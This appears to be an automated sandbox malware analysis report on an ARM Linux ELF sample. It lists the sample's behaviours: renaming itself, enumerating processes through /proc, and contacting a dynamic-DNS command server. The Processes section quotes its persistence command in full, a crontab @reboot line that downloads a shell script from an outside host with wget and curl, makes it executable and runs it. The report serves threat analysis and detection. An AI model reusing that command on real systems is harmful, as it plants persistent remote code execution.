Malware Analysis Report

2024-11-13 15:53

Sample ID 241027-c9n9lasfke
Target ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
SHA256 ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645
Tags
defense_evasion discovery execution persistence privilege_escalation
score
7/10

Analysis Overview

score
7/10

SHA256

ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645

Threat Level: Shows suspicious behavior

The file ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Enumerates running processes

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:46

Reported

2024-10-27 02:49

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

140s

Command Line

[/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 81.169.136.222 | N/A | N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.wNhaz5 | /usr/bin/crontab | N/A

Enumerates running processes

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A

Reads runtime system information

discovery
Description | Indicator | Process | Target
File opened for reading | /proc/705/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/677/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/694/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/682/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/684/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/688/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/691/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/700/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/707/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/675/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/680/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/690/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/698/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/703/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/706/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/709/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/674/cmdline | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/687/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/670/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/2/cmdline | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/669/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/696/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/704/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/708/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/674/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/683/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/701/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/673/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/1/cmdline | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/678/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/681/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/695/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/702/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/710/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/665/cmdline | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/672/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/676/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/679/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/689/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/692/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/693/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/697/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/mounts | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/671/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A
File opened for reading | /proc/699/status | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A

Processes

/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf

[/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country | Destination | Domain | Proto
DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp
HK | 193.233.193.45:3869 | kingstonwikkerink.dyn | tcp

Files

/var/spool/cron/crontabs/tmp.wNhaz5

MD5 a7092eb6aa79161f5a3758d751aae1b3
SHA1 0f3e2f380e53ee3e3c412b75715939031fa40b04
SHA256 f6cd9800f1a8a1025b04977d62bcaf5f0d4642f8822ea73db53b5d986d576ac4
SHA512 02ea889ecb85f5ee111b8c7cc9937423214e809d1edbe85cedb8984e9dbc0a2c49561ca9159d468216bb27617211d74b80f2aefab34b2199b7e007eb7b487ba0